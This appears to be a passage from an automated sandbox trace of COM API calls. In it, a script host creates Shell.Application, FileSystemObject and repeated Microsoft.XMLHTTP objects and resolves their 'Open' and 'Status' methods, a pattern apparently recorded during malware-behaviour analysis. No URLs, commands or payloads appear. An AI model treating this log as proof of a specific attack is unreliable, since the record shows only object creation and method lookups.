	[0260.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0260.120] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0260.120] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0260.120] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0260.120] SysStringLen (param_1=0x0) returned 0x0
	[0260.120] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0260.120] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0260.120] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0260.120] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0260.120] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0260.120] ??2@YAPEAX_K@Z () returned 0x62f350
	[0260.120] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0260.120] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0260.120] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0260.120] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0260.121] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0260.121] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0260.121] SysStringLen (param_1=0x0) returned 0x0
	[0260.121] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0260.123] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0260.123] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0260.123] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0260.123] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0260.123] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0260.123] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0260.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0260.719] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0260.719] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0260.720] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.720] SysStringLen (param_1=0x0) returned 0x0
	[0260.720] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.720] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0260.720] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.720] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7838) returned 0x0
	[0260.720] ??2@YAPEAX_K@Z () returned 0x62f310
	[0260.720] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7838, pUnkSite=0x62f310) 
	[0260.720] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.721] XMLHTTPRequest:IUnknown:Release (This=0x49c7838) returned 0x0
	[0260.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0260.721] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0260.721] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.721] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.723] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.723] SysStringLen (param_1=0x0) returned 0x0
	[0260.723] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.724] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0260.724] ??2@YAPEAX_K@Z () returned 0x62f330
	[0260.724] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.724] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.724] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.724] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.724] SysStringLen (param_1=0x0) returned 0x0
	[0260.724] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.724] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77a0) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7808) returned 0x0
	[0260.725] ??2@YAPEAX_K@Z () returned 0x62f310
	[0260.725] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7808, pUnkSite=0x62f310) 
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.725] XMLHTTPRequest:IUnknown:Release (This=0x49c7808) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77a0) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77a0) returned 0x3
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.725] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.725] SysStringLen (param_1=0x0) returned 0x0
	[0260.725] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.725] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7850) returned 0x0
	[0260.725] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0260.726] ??2@YAPEAX_K@Z () returned 0x62f330
	[0260.726] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0260.726] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7850) returned 0x0
	[0260.726] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7850) returned 0x3
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0260.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7850, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7850, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0260.726] longjmp () 
	[0260.726] longjmp () 
	[0260.726] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0260.726] SysStringLen (param_1=0x0) returned 0x0
	[0260.726] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0260.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0260.727] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0260.727] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0260.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0260.727] ??2@YAPEAX_K@Z () returned 0x62f310
	[0260.727] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
